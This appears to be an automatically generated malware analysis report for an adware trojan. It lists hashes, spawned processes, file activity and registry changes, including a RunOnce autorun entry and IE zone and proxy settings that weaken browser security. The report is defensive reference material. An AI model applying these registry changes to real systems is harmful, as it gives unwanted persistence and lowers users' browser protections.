Trojan.NSIS.StartPage_358c5cfa47

by malwarelabrobot on April 30th, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.ConvertAd.beu (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 358c5cfa475c092625893377a53bb4b4
SHA1: 7e460e49b9cc61530194cfa9a67f7b470775db4e
SHA256: 03c6607b9417343d06afe8d9f31c480ec3414ebee81930568d9785c083de607d
SSDeep: 6144:ezfj/bWIcLbT57oVD5YjbfRf6lU8/qxDNgALdjEfDQ69uX7utrq:E/qIcLp7oRyjNf6K8SxDmAaF9uX7uY
Size: 462192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsz1D.tmp:584
nsh16.tmp:1976
%original file name%.exe:348
qnse20.tmp:532
qnse20.tmp:1764
nsa22.tmp:2036
nsoA.tmp:320
Full_Setup.exe:1240

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nsz1D.tmp:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (3342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp (2660 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nse20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (0 bytes)

The process nsh16.tmp:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (37949 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe (1184 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (0 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (2 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (14400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (43 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (201 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\CAQ1ETAB.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[2].htm (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (0 bytes)

The process nsa22.tmp:2036 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb24.tmp (0 bytes)

The process nsoA.tmp:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\vos_n[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1] (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa22.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp (0 bytes)

The process Full_Setup.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)

Registry activity

The process nsz1D.tmp:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 8F 79 FF 6B 9B AE B3 B6 45 5D DE AE E8 5D B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayIcon" = "/fd="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsh16.tmp:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 4B 68 8E 88 3A C8 91 63 5F 97 1C 31 A8 61 19"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayName" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"Publisher" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"

"Publisher" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC BA 94 BB EE E3 5F F3 24 E0 72 47 EF 19 2F FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process qnse20.tmp:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 94 00 06 6F D2 9B AB 07 B3 FD 8F 33 E8 B6 0E"

The process qnse20.tmp:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 45 AD 46 95 1C 76 24 DD 54 E4 75 F2 1F CF 44"

The process nsa22.tmp:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 07 A5 5F 90 50 5F 8E 21 D8 A5 30 CC 6A 99 F9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsoA.tmp:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 69 3E 45 83 1E D3 C3 FC 76 C5 D0 C5 5B A2 B4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Full_Setup.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 E4 6C 63 7F 33 54 C6 C2 9B 1D CE A6 62 A1 97"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

